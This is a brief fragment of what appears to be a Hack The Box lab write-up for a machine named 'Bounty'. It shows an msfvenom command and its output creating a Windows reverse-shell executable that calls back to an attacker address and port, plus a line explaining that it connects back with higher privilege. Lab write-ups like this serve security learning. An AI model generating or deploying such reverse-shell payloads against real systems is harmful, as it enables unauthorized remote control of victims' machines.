msfvenom


┌──(kali㉿kali)-[~/archive/htb/labs/bounty]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=1231 -f exe -o pe.exe   
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
payload size: 324 bytes
final size of exe file: 73802 bytes
saved as: pe.exe

MSFVenom generated an executable program for the exploit to connect back to the attacking machine with a higher privilege